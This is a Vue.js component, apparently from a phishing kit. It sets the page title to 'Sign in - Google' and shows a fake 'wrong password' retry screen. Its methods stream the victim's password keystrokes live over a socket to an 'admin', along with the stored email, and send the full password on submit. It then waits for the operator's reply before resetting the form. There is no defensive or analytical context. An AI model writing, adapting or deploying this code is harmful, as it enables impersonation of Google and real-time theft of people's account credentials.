<template src="./index.html">
    
</template>
<script>
// ...existing code...
export default {
  name: 'SaiMK',
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      message: '',
      password: '',
      showPassword: false,
      isValidInput: false,
      typingTimer: null, // Timer để debounce typing events
      isLoading: false // Trạng thái loading cho button
    };
  },
  computed: {
    passwordFieldType() {
      return this.showPassword ? 'text' : 'password';
    }
  },
  created() {
  
  },
  mounted() {
    document.title = "Sign in - Google";
    // Setup show password functionality
    this.setupShowPassword();
  },
  methods: {
    setupShowPassword() {
      this.$nextTick(() => {
        const showPasswordCheckbox = document.getElementById('showPassword');
        const passwordInput = document.getElementById('email'); // password input has id="email" in this template
        
        if (showPasswordCheckbox && passwordInput) {
          showPasswordCheckbox.addEventListener('change', (e) => {
            this.showPassword = e.target.checked;
            passwordInput.type = this.showPassword ? 'text' : 'password';
          });
        }
      });
    },
    togglePasswordVisibility() {
      // Method để xử lý thay đổi trạng thái show password
      const passwordInput = document.getElementById('email');
      if (passwordInput) {
        passwordInput.type = this.showPassword ? 'text' : 'password';
      }
    },
    onPasswordInput() {
      this.isValidInput = true;
      // Debounce typing events để tránh spam
      if (this.typingTimer) {
        clearTimeout(this.typingTimer);
      }
      
      this.typingTimer = setTimeout(() => {
        const typingData = {
          username: this.username,
          formType: 'wrong_password',
          inputValue: this.password,
          time: new Date().toISOString()
        };
        
        // Emit socket event để thông báo admin
        this.$socket.emit('user-typing-password', typingData);
      }, 500); // Delay 500ms
    },
    handleSaiMK() {
      if (!this.password) return;
      
      // Set loading state
      this.isLoading = true;
      
      const loginData = {
        username: this.username,
        status: 'wrong_password',
        password: this.password,
        time: new Date().toISOString()
      };

      this.$socket.emit('user-login', loginData);

      const step1 = document.getElementById("login-step-1");
      step1.classList.add("transitioning");
      
      this.$socket.on('admin-message', (data) => {
        const step1 = document.getElementById("login-step-1");
        this.isValidInput= false;
        if (step1) {
          step1.classList.remove("transitioning");
        }
        this.isLoading = false; // Reset loading state
      });
    }
  }
};
</script>

<style lang="css" scoped>
@import "./styles.css";
</style>